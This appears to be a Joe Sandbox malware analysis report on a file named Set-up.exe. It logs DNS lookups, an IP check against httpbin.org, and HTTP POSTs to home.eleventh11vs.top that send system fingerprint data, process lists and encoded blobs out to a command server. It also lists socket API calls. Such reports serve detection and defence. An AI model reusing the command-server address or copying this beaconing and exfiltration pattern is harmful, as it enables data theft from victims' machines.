Dec 30, 2024 18:12:04.352471113 CET	80	49731	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:04.482578039 CET	49732	53	192.168.2.4	1.1.1.1
Dec 30, 2024 18:12:04.487359047 CET	53	49732	1.1.1.1	192.168.2.4
Dec 30, 2024 18:12:04.491729021 CET	49732	53	192.168.2.4	1.1.1.1
Dec 30, 2024 18:12:04.525871992 CET	49732	53	192.168.2.4	1.1.1.1
Dec 30, 2024 18:12:04.729617119 CET	53	49732	1.1.1.1	192.168.2.4
Dec 30, 2024 18:12:05.481374025 CET	53	49732	1.1.1.1	192.168.2.4
Dec 30, 2024 18:12:05.481807947 CET	49732	53	192.168.2.4	1.1.1.1
Dec 30, 2024 18:12:05.481987000 CET	49733	80	192.168.2.4	194.87.58.155
Dec 30, 2024 18:12:05.486764908 CET	80	49733	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:05.486932039 CET	53	49732	1.1.1.1	192.168.2.4
Dec 30, 2024 18:12:05.496841908 CET	49733	80	192.168.2.4	194.87.58.155
Dec 30, 2024 18:12:05.496843100 CET	49732	53	192.168.2.4	1.1.1.1
Dec 30, 2024 18:12:05.497298956 CET	49733	80	192.168.2.4	194.87.58.155
Dec 30, 2024 18:12:05.502065897 CET	80	49733	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:06.280271053 CET	80	49733	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:06.280328989 CET	80	49733	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:06.280381918 CET	49733	80	192.168.2.4	194.87.58.155
Dec 30, 2024 18:12:06.280601978 CET	49733	80	192.168.2.4	194.87.58.155
Dec 30, 2024 18:12:06.285330057 CET	80	49733	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:07.189352989 CET	49734	80	192.168.2.4	194.87.58.155
Dec 30, 2024 18:12:07.194209099 CET	80	49734	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:07.194370031 CET	49734	80	192.168.2.4	194.87.58.155
Dec 30, 2024 18:12:07.194700956 CET	49734	80	192.168.2.4	194.87.58.155
Dec 30, 2024 18:12:07.199474096 CET	80	49734	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:08.028862000 CET	80	49734	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:08.028990030 CET	80	49734	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:08.029150963 CET	49734	80	192.168.2.4	194.87.58.155
Dec 30, 2024 18:12:08.029191017 CET	49734	80	192.168.2.4	194.87.58.155
Dec 30, 2024 18:12:08.033961058 CET	80	49734	194.87.58.155	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 30, 2024 18:11:56.779850006 CET	50733	53	192.168.2.4	1.1.1.1
Dec 30, 2024 18:11:56.779902935 CET	50733	53	192.168.2.4	1.1.1.1
Dec 30, 2024 18:11:56.786699057 CET	53	50733	1.1.1.1	192.168.2.4
Dec 30, 2024 18:11:56.786880970 CET	53	50733	1.1.1.1	192.168.2.4
Dec 30, 2024 18:11:59.780486107 CET	50736	53	192.168.2.4	1.1.1.1
Dec 30, 2024 18:11:59.780632973 CET	50736	53	192.168.2.4	1.1.1.1
Dec 30, 2024 18:12:00.288121939 CET	53	50736	1.1.1.1	192.168.2.4
Dec 30, 2024 18:12:00.288213015 CET	53	50736	1.1.1.1	192.168.2.4
Dec 30, 2024 18:12:04.470122099 CET	50738	53	192.168.2.4	1.1.1.1
Dec 30, 2024 18:12:04.470182896 CET	50738	53	192.168.2.4	1.1.1.1
Dec 30, 2024 18:12:04.477685928 CET	53	50738	1.1.1.1	192.168.2.4
Dec 30, 2024 18:12:04.478246927 CET	53	50738	1.1.1.1	192.168.2.4
Dec 30, 2024 18:12:06.292031050 CET	50740	53	192.168.2.4	1.1.1.1
Dec 30, 2024 18:12:06.292103052 CET	50740	53	192.168.2.4	1.1.1.1
Dec 30, 2024 18:12:07.074273109 CET	53	50740	1.1.1.1	192.168.2.4
Dec 30, 2024 18:12:07.188497066 CET	53	50740	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 30, 2024 18:11:56.779850006 CET	192.168.2.4	1.1.1.1	0x6c04	Standard query (0)	httpbin.org	A (IP address)	IN (0x0001)	false
Dec 30, 2024 18:11:56.779902935 CET	192.168.2.4	1.1.1.1	0x74bb	Standard query (0)	httpbin.org	28	IN (0x0001)	false
Dec 30, 2024 18:11:59.780486107 CET	192.168.2.4	1.1.1.1	0x368	Standard query (0)	home.eleventh11vs.top	A (IP address)	IN (0x0001)	false
Dec 30, 2024 18:11:59.780632973 CET	192.168.2.4	1.1.1.1	0x1654	Standard query (0)	home.eleventh11vs.top	28	IN (0x0001)	false
Dec 30, 2024 18:12:04.470122099 CET	192.168.2.4	1.1.1.1	0x439b	Standard query (0)	home.eleventh11vs.top	A (IP address)	IN (0x0001)	false
Dec 30, 2024 18:12:04.470182896 CET	192.168.2.4	1.1.1.1	0x4150	Standard query (0)	home.eleventh11vs.top	28	IN (0x0001)	false
Dec 30, 2024 18:12:04.525871992 CET	192.168.2.4	1.1.1.1	0x439b	Standard query (0)	home.eleventh11vs.top	A (IP address)	IN (0x0001)	false
Dec 30, 2024 18:12:06.292031050 CET	192.168.2.4	1.1.1.1	0x29	Standard query (0)	home.eleventh11vs.top	A (IP address)	IN (0x0001)	false
Dec 30, 2024 18:12:06.292103052 CET	192.168.2.4	1.1.1.1	0xafbf	Standard query (0)	home.eleventh11vs.top	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 30, 2024 18:11:56.786880970 CET	1.1.1.1	192.168.2.4	0x6c04	No error (0)	httpbin.org	34.197.122.172	A (IP address)	IN (0x0001)	false
Dec 30, 2024 18:11:56.786880970 CET	1.1.1.1	192.168.2.4	0x6c04	No error (0)	httpbin.org	52.202.253.164	A (IP address)	IN (0x0001)	false
Dec 30, 2024 18:12:00.288121939 CET	1.1.1.1	192.168.2.4	0x368	No error (0)	home.eleventh11vs.top	194.87.58.155	A (IP address)	IN (0x0001)	false
Dec 30, 2024 18:12:05.481374025 CET	1.1.1.1	192.168.2.4	0x439b	No error (0)	home.eleventh11vs.top	194.87.58.155	A (IP address)	IN (0x0001)	false
Dec 30, 2024 18:12:07.074273109 CET	1.1.1.1	192.168.2.4	0x29	No error (0)	home.eleventh11vs.top	194.87.58.155	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

httpbin.org

home.eleventh11vs.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	194.87.58.155	80	6700	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 18:12:00.295105934 CET	12360	OUT	POST /MTLObSmOhYIfQKgEYuXW1735556847 HTTP/1.1 Host: home.eleventh11vs.top Accept: / Content-Type: application/json Content-Length: 560083 Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 34 30 37 33 32 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED] Data Ascii: { "ip": "8.46.123.189", "current_time": "8532915458317407325", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 988 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 696 }, { "name": "svchost.exe" [TRUNCATED]
Dec 30, 2024 18:12:00.300040960 CET	9888	OUT	Data Raw: 5c 2f 41 47 76 44 39 6e 58 39 4d 61 70 54 6a 56 70 2b 44 38 5a 30 35 4b 36 6c 48 78 44 38 4b 35 4a 5c 2f 64 78 78 64 4e 62 4e 4e 4a 78 64 30 30 6d 6a 38 68 36 4b 5c 2f 5a 6d 32 5c 2f 34 4a 4b 43 34 5c 2f 35 75 42 32 66 39 30 70 33 66 2b 39 4a 58 Data Ascii: \/AGvD9nX9MapTjVp+D8Z05K6lHxD8K5J\/dxxdNbNNJxd00mj8h6K\/Zm2\/4JKC4\/5uB2f90p3f+9JX\/OPWvyi+JHhA\/D34h+PfALagNWPgfxp4p8IHVRamxGpnw1rl9op1AWRuLs2YvTZfaRam7uvs\/meV9om2eY37R4K\/Su8AfpEZlnWT+DvHv+uGY8O4HD5nnGG\/1X404f8AqeBxWIeFoV\/a8UcO5JQxHPXTp+z
Dec 30, 2024 18:12:00.300126076 CET	4944	OUT	Data Raw: 4e 4e 34 43 6c 31 43 33 57 57 34 6c 67 54 53 31 46 67 4c 4c 55 62 33 52 64 56 31 44 55 34 62 66 77 5a 2b 4e 34 37 67 44 41 59 6e 4b 4d 71 78 57 64 63 41 63 4d 65 47 66 44 75 66 7a 79 32 4f 58 38 5a 79 34 74 34 6d 34 67 7a 66 4a 50 37 52 77 6b 73 Data Ascii: NN4Cl1C3WW4lgTS1FgLLUb3RdV1DU4bfwZ+N47gDAYnKMqxWdcAcMeGfDufzy2OX8Zy4t4m4gzfJP7Rwks1yr\/WPIqOb5yp18+yrDYh5bRqcP8ADNDEVZwqSxWBprlP6PwPH+Pw+b5phck8QOJ\/EziLII5jLMODFwjwzw\/k+d\/2dioZTmz4cz2tlOTSp4fIc0xGHWZVqfEHEtfD0oTgsJjpyclyP\/BWb4Jz+EP2ctI8aa3
Dec 30, 2024 18:12:00.300220966 CET	7416	OUT	Data Raw: 46 35 73 55 66 6d 5c 2f 76 38 41 37 4f 50 62 67 66 38 41 31 5c 2f 30 44 74 6a 33 6f 5c 2f 77 44 7a 79 38 72 2b 75 50 38 41 50 4e 48 7a 6e 37 69 53 66 36 33 7a 62 58 30 5c 2f 4c 50 38 41 6e 74 51 42 57 38 74 57 5c 2f 67 32 6f 38 76 37 72 5c 2f 70 Data Ascii: F5sUfm\/v8A7OPbgf8A1\/0Dtj3o\/wDzy8r+uP8APNHzn7iSf63zbX0\/LP8AntQBW8tW\/g2o8v7r\/pt\/n3p8n7zY7pG\/l\/uv9b\/y7\/8ALpjvU3kptR3G9Jf+Wfm\/uP8Ar6\/+v3\/Wq3ySfu9nzxn91+6\/z\/n9Z9r5y\/r5nQMX+Pf8iSf609+vH8+fqKEkfCeS+\/8AeiLzOkH+en+eaftf5P8AV\/63\/Pf\/
Dec 30, 2024 18:12:00.304600000 CET	2472	OUT	Data Raw: 69 5c 2f 75 44 31 37 66 30 48 2b 50 72 7a 56 61 52 58 52 6a 5c 2f 48 2b 76 2b 54 36 48 72 36 31 66 6b 5c 2f 33 50 35 5c 2f 38 41 36 5c 2f 58 30 41 70 6e 38 50 33 49 5c 2f 38 38 5c 2f 54 38 4d 5a 39 75 39 42 76 37 54 79 5c 2f 48 5c 2f 67 46 44 35 Data Ascii: i\/uD17f0H+PrzVaRXRj\/H+v+T6Hr61fk\/3P5\/8A6\/X0Apn8P3I\/88\/T8MZ9u9Bv7Ty\/H\/gFD5\/+WnTv\/T39KYG+V8f9df8APfpk1Zkj+5\/nr\/Un36VWSPEe9\/n5\/wA\/\/WoOin1+X6kPmdf4\/wBM+1MVY2ZJH\/z\/AKN\/9aptv8D4\/nx\/9bP5fjUP+3\/yz\/8Ar\/n04+vHWg7CH7y\/P6dI+f8AP
Dec 30, 2024 18:12:00.305003881 CET	7416	OUT	Data Raw: 78 5c 2f 6e 38 7a 54 31 5c 2f 33 4a 50 66 7a 50 33 48 2b 65 44 37 63 30 66 4c 49 30 7a 75 6d 39 5c 2f 4e 5c 2f 64 66 35 37 66 35 34 46 5a 6e 51 4d 38 74 31 38 37 2b 5c 2f 48 5c 2f 77 42 4d 76 31 5c 2f 72 52 49 30 79 79 4a 44 5c 2f 41 41 66 38 5c Data Ascii: x\/n8zT1\/3JPfzP3H+eD7c0fLI0zum9\/N\/df57f54FZnQM8t187+\/H\/wBMv1\/rRI0yyJD\/AAf8\/H9cChI92\/Y5f\/tr7frnNN2\/MjpDgf6qXzP8\/lWntPL8f+ABDH+8k8vZHMkf2iXzT+487v8A45p8mf3e\/wC5\/n\/Rbupdyfc2DHm\/8u8Xkf5zUMcj4\/uJH\/qv311\/4C\/rk0fH5W+e\/wB3Y0p9fl+o
Dec 30, 2024 18:12:00.305133104 CET	7416	OUT	Data Raw: 34 5c 2f 68 7a 38 58 66 67 6a 38 59 4e 45 38 64 5c 2f 74 47 2b 44 50 32 55 72 6a 78 56 38 50 76 45 50 78 49 73 39 4c 38 41 5c 2f 47 5c 2f 34 68 58 55 30 48 67 76 77 31 38 51 64 41 2b 4a 5c 2f 77 6b 2b 47 76 78 47 30 33 53 76 45 6b 56 6c 72 6c 35 Data Ascii: 4\/hz8Xfgj8YNE8d\/tG+DP2UrjxV8PvEPxIs9L8A\/G\/4hXU0Hgvw18QdA+J\/wk+GvxG03SvEkVlrl5ovjHw\/4F8T+ENVj8M+JNP03W7vXtIn0Y+Z+D\/FumeNdFGu6PIktkbu6sg8UvnRNLaOI5Gjl8uIvGzHKFo0YqQWVScD9N4Z8RuCOMa7wvDPEeAzfFRwyxk8LQdaGKpYWSozp1q2HxFKjWowq0sThcRR9rCDr4TFY
Dec 30, 2024 18:12:00.351046085 CET	34608	OUT	Data Raw: 47 50 6a 6e 34 55 66 46 4c 77 76 5c 2f 41 4d 45 33 76 32 6e 50 67 70 38 4d 62 4e 5c 2f 44 48 6a 53 62 78 48 34 44 2b 4d 50 6a 6a 5c 2f 67 70 73 6e 78 79 2b 47 6e 68 32 33 38 62 32 58 68 32 36 73 37 4c 78 64 59 66 73 35 72 63 65 4a 39 4e 2b 4a 47 Data Ascii: GPjn4UfFLwv\/AME3v2nPgp8MbN\/DHjSbxH4D+MPjj\/gpsnxy+Gnh238b2Xh26s7LxdYfs5rceJ9N+JGkeIE07w3rtnALTxdpXxDg062T76uND0S7kWa60fSrmZcbZbjT7SaRcYxteSFmGMDGDxgelRHw54eLiQ6DopkUYVzpdiXA54DeRkDk8A9z6muLin6GuVcS8TZ3xJHjfO8tq57nGNzXFUMJSoxt9e4bxPC06CrLlqzh
Dec 30, 2024 18:12:00.399055004 CET	1236	OUT	Data Raw: 78 58 31 6a 5c 2f 77 42 49 4c 69 76 58 4b 39 6c 2b 43 50 37 4a 47 6f 66 74 74 2b 49 5c 2f 45 50 77 43 30 76 78 78 59 5c 2f 44 79 5c 2f 77 44 45 48 67 62 78 4c 71 45 48 69 58 55 64 43 75 50 45 4e 6e 62 69 78 6a 74 6f 4a 59 70 64 4f 74 64 53 30 71 Data Ascii: xX1j\/wBILivXK9l+CP7JGoftt+I\/EPwC0vxxY\/Dy\/wDEHgbxLqEHiXUdCuPENnbixjtoJYpdOtdS0qdt0F7JOjpcnMlusDIqzGeH8k8Xsxw+XeFniJisZUVGguDeIaDqclSp+9xeWYnCYePLSjOf7zEV6VO\/Lyx5uabjCMpL\/PP6N2DxOO+kD4KUsLT9rUo+KPA+PqR54Q5cJlfEWX5nj6t6koRfsMFhMRX5It1Kvs\/Z
Dec 30, 2024 18:12:00.447066069 CET	1236	OUT	Data Raw: 55 4d 54 48 48 78 6a 69 7a 39 49 66 2b 43 71 47 76 5c 2f 73 4b 65 4b 66 32 70 70 76 45 48 5c 2f 42 50 57 43 33 74 76 67 6a 71 6e 67 44 77 7a 50 72 31 76 70 66 68 58 78 6c 34 4b 38 4d 78 66 45 30 58 2b 76 78 65 49 78 34 54 38 4e 65 4f 72 62 54 39 Data Ascii: UMTHHxjiz9If+CqGv\/sKeKf2ppvEH\/BPWC3tvgjqngDwzPr1vpfhXxl4K8MxfE0X+vxeIx4T8NeOrbT9c0zQ5NEj8LzNbjSdI06PWJNXj06xNsi3l3F+xD\/yAPFv\/AGGD\/wCkWl1+cdfpD+xDC48PeK3ZGVZdVZo2IIDgWunR5U9CA8cin3U+lf2L+zoxNXNPpY5ZmCwmHw3tuG+L8VWoYChKjg8NGpgqUX7OlzVPY0faV
Dec 30, 2024 18:12:00.496628046 CET	1236	OUT	Data Raw: 46 62 7a 37 62 63 53 49 4e 43 38 66 2b 42 6f 30 30 33 2b 79 66 45 50 6b 52 76 63 61 66 5a 36 79 62 48 53 37 32 35 55 57 38 74 78 48 34 62 38 51 32 39 30 49 4c 6a 7a 56 6a 6b 5c 2f 4d 6a 34 65 66 73 65 5c 2f 74 71 5c 2f 46 54 55 76 32 53 5c 2f 67 Data Ascii: Fbz7bcSINC8f+Bo003+yfEPkRvcafZ6ybHS725UW8txH4b8Q290ILjzVjk\/Mj4efse\/tq\/FTUv2S\/gB4y\/ZP8H\/A3w1+zH4+h1\/xV8e4ItFttU8TaTZ6\/a6vdzPq2nandHxJqF3HaEW8OiyalHq2uSWOpXtxotjBcyw\/qv8AE\/8AY9\/aE+B3xi8YftG\/8E\/vFvg3Rr34k3i6v8ZP2bviUt7H8MPiDrpmuLi68U
Dec 30, 2024 18:12:04.339529991 CET	157	IN	HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Mon, 30 Dec 2024 17:12:04 GMT Content-Type: text/html; charset=utf-8 Content-Length: 1 Connection: close Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49733	194.87.58.155	80	6700	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 18:12:05.497298956 CET	101	OUT	GET /MTLObSmOhYIfQKgEYuXW1735556847?argument=0 HTTP/1.1 Host: home.eleventh11vs.top Accept: /
Dec 30, 2024 18:12:06.280271053 CET	372	IN	HTTP/1.1 404 NOT FOUND Server: nginx/1.22.1 Date: Mon, 30 Dec 2024 17:12:06 GMT Content-Type: text/html; charset=utf-8 Content-Length: 207 Connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49734	194.87.58.155	80	6700	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 18:12:07.194700956 CET	174	OUT	POST /MTLObSmOhYIfQKgEYuXW1735556847 HTTP/1.1 Host: home.eleventh11vs.top Accept: / Content-Type: application/json Content-Length: 31 Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Dec 30, 2024 18:12:08.028862000 CET	372	IN	HTTP/1.1 404 NOT FOUND Server: nginx/1.22.1 Date: Mon, 30 Dec 2024 17:12:07 GMT Content-Type: text/html; charset=utf-8 Content-Length: 207 Connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	34.197.122.172	443	6700	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 17:11:57 UTC	52	OUT	GET /ip HTTP/1.1 Host: httpbin.org Accept: /
2024-12-30 17:11:58 UTC	224	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 17:11:58 GMT Content-Type: application/json Content-Length: 31 Connection: close Server: gunicorn/19.9.0 Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true
2024-12-30 17:11:58 UTC	31	IN	Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a Data Ascii: { "origin": "8.46.123.189"}

Target ID:	0
Start time:	12:11:55
Start date:	30/12/2024
Path:	C:\Users\user\Desktop\Set-up.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Set-up.exe"
Imagebase:	0x800000
File size:	6'759'048 bytes
MD5 hash:	F54B04DCDDB77FDC57B307E8EC7DAEA1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	29.8%
Total number of Nodes:	1520
Total number of Limit Nodes:	78

Executed Functions

Function 0083A550 Relevance: 67.3, APIs: 23, Strings: 15, Instructions: 777networkstringCOMMON

Download Yara Rule

APIs

Part of subcall function 0081D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,008101B1), ref: 0081D8E2

setsockopt.WS2_32(?,00000029,0000001B,00000000,00000004), ref: 0083A670
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0083A6A1
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0083A6AB
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0083A6AF

Part of subcall function 0081D090: GetLastError.KERNEL32 ref: 0081D0A1
Part of subcall function 0081D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0081D0A9
Part of subcall function 0081D090: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0081D0CD
Part of subcall function 0081D090: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0081D0D7
Part of subcall function 0081D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000A), ref: 0081D381
Part of subcall function 0081D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000D), ref: 0081D3A2
Part of subcall function 0081D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0081D3BF
Part of subcall function 0081D090: GetLastError.KERNEL32 ref: 0081D3C9
Part of subcall function 0081D090: SetLastError.KERNEL32(00000000), ref: 0081D3D4

Part of subcall function 00844F40: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00844F9E

setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0083A831
WSAGetLastError.WS2_32 ref: 0083A854
getsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 0083A97A
setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 0083A9A6
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0083AB0F
htons.WS2_32(?), ref: 0083AC01
getsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 0083AC38
setsockopt.WS2_32(?,0000FFFF,00001001,00004020,00000004), ref: 0083AC64
WSAGetLastError.WS2_32 ref: 0083ACDC
WSAGetLastError.WS2_32 ref: 0083ADF5
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000025), ref: 0083AE9D
htons.WS2_32(?), ref: 0083AEDB
bind.WS2_32(?,00000002,00000010), ref: 0083AEF5
WSAGetLastError.WS2_32 ref: 0083AFB9
htons.WS2_32(?), ref: 0083AFFC
bind.WS2_32(?,?,?), ref: 0083B014
WSAGetLastError.WS2_32 ref: 0083B056
htons.WS2_32(?), ref: 0083B0D2
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,00000000,0000000A), ref: 0083B0EA

Strings

@, xrefs: 0083A8F4
Local Interface %s is ip %s using address family %i, xrefs: 0083AE60
cf-socket.c, xrefs: 0083A5CD, 0083A735
sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0083A6CE
Bind to local port %d failed, trying next, xrefs: 0083AFE5
Local port: %hu, xrefs: 0083AF28
Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0083AD0A
Trying [%s]:%d..., xrefs: 0083A689
bind failed with errno %d: %s, xrefs: 0083B080
Couldn't bind to '%s' with errno %d: %s, xrefs: 0083AE1F
cf_socket_open() -> %d, fd=%d, xrefs: 0083A796
@, xrefs: 0083AC42
Could not set TCP_NODELAY: %s, xrefs: 0083A871
Name '%s' family %i resolved to '%s' family %i, xrefs: 0083ADAC
Trying %s:%d..., xrefs: 0083A7C2, 0083A7DE

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: ErrorLast$_errno$htonssetsockopt$bindgetsockoptstrrchr$CounterPerformanceQuery__sys_errlist__sys_nerrstrchrstrcpystrlenstrtoul
